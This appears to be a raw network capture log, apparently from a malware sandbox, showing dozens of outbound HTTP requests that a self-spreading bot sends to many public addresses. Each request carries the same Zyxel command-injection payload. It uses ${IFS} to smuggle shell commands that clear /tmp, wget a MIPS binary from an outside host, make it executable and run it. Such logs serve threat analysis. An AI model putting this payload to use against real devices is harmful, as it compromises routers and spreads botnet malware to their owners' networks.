                                    Jan 13, 2024 19:02:53.636081934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9199192.168.2.1342650124.99.229.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636131048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9200192.168.2.1343220105.178.96.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636184931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9201192.168.2.1359154142.49.146.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636226892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9202192.168.2.133772699.194.147.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636281967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9203192.168.2.1356382144.17.58.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636328936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9204192.168.2.1352158101.177.187.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636409998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9205192.168.2.1339086186.174.148.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636445999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9206192.168.2.1356330174.126.73.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636502981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9207192.168.2.1350530180.9.36.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636547089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9208192.168.2.1353678107.102.49.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636620045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9209192.168.2.1335794198.4.205.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636683941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9210192.168.2.1350996118.172.31.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636738062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9211192.168.2.1344276144.219.162.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636780024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9212192.168.2.133832014.241.192.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636842012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9213192.168.2.1339706177.214.119.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636893034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9214192.168.2.1354022186.60.202.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.636950970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9215192.168.2.1355628132.200.251.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637001038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9216192.168.2.1334336160.130.212.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637062073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9217192.168.2.1341702192.162.21.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637121916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9218192.168.2.1350290130.74.26.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637176037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9219192.168.2.1340602159.236.192.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637258053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9220192.168.2.13451704.229.242.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637303114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9221192.168.2.1338900153.159.147.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637360096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9222192.168.2.135330686.159.219.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637406111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9223192.168.2.134247898.154.228.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637471914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9224192.168.2.1349506122.223.111.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637531996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9225192.168.2.135954065.220.254.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637581110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9226192.168.2.1340380162.216.87.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637634039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9227192.168.2.13400765.10.41.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637702942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9228192.168.2.135081448.255.224.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637763023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9229192.168.2.1348930196.199.246.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637830019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9230192.168.2.1341810104.108.151.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637877941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9231192.168.2.1346682164.171.230.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637936115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9232192.168.2.134711644.139.173.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.637995005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9233192.168.2.133383840.136.78.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638051033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9234192.168.2.1339258208.80.64.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638115883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9235192.168.2.1354130179.32.103.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638170004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9236192.168.2.134025695.20.184.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638217926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9237192.168.2.133417696.243.116.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638261080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9238192.168.2.1337578106.4.34.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638335943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9239192.168.2.135277859.177.125.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638386965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9240192.168.2.1342802144.104.165.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638421059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9241192.168.2.1333108112.182.21.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638468981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9242192.168.2.134076027.169.36.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638505936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9243192.168.2.1352010117.101.97.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638597012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9244192.168.2.1351080193.109.165.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638658047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9245192.168.2.134291889.148.214.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638681889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9246192.168.2.1341884161.255.194.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638741016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9247192.168.2.1359488217.152.106.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638783932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9248192.168.2.1338990141.197.243.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638827085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9249192.168.2.1342306187.199.40.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638895035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9250192.168.2.136036452.97.108.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.638952017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9251192.168.2.133479420.8.210.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639014959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9252192.168.2.1350946115.155.139.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639062881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9253192.168.2.1355390218.29.240.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639085054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9254192.168.2.133934813.7.101.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639153004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9255192.168.2.1333678166.0.175.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639214993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9256192.168.2.1356716119.25.186.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639271021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9257192.168.2.1359358148.115.221.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639322042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9258192.168.2.133630027.158.65.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639380932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9259192.168.2.1345682119.96.149.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639441967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9260192.168.2.1335238169.237.85.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.639481068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9261192.168.2.1343224159.35.225.98443
                                    TimestampBytes transferredDirectionData
